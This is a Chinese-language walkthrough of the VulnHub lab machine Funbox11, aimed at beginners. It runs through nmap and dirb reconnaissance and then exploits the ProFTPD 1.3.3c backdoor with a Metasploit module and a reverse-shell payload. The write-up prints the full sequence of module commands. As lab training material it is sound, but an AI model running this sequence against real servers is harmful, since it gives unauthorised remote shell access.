vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
老样子需要找到flag即可。
https://download.vulnhub.com/funbox/Funbox11.ova
下载好了把安装包解压 然后导入Oracle VM
打开即可。
kali里使用netdiscover
发现主机
渗透机:kali IP :172.16.5.107 靶机IP :172.16.5.4
ping
的通 环境搭建成功!
通过nmap
扫描发现开启了21,22
和25,80,139,143,445
端口 访问80
端口 简单dirb
扫描一下 发现是 Wordpress
需要添加 /etc/hosts funbox11
因为开启了 21
端口 可以尝试 ftp
匿名登入 登入失败 所以不行!!
通过刚刚的扫描发现FTP
版本号为1.3.3c
searchsploit
搜索本地漏洞库!
metasploit
执行漏洞 具体看下面代码!
use exploit/unix/ftp/proftpd_133c_backdoor #使用模块
show options #查看选项
set RHOSTS 172.16.5.4 #设置目标靶机
show payloads #查看 payload
set payload payload/cmd/unix/reverse #设置payload
show options
set LHOST 172.16.5.107 #设置本机ip
exploit
至此获取到了所有得flag,渗透测试结束。
FunBox
系列第十一个靶机了 也是最后一个比较简单
1.信息收集 获取ip地址 和端口信息
2.metasploit
的基本操作
3. 了解 ProFTPD 1.3.3c
后门命令执行漏洞
这是这个系列第十一个靶机啦 比较简单 希望对刚入门得小白有帮助! 至此这个系列更新完啦!🙂
最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!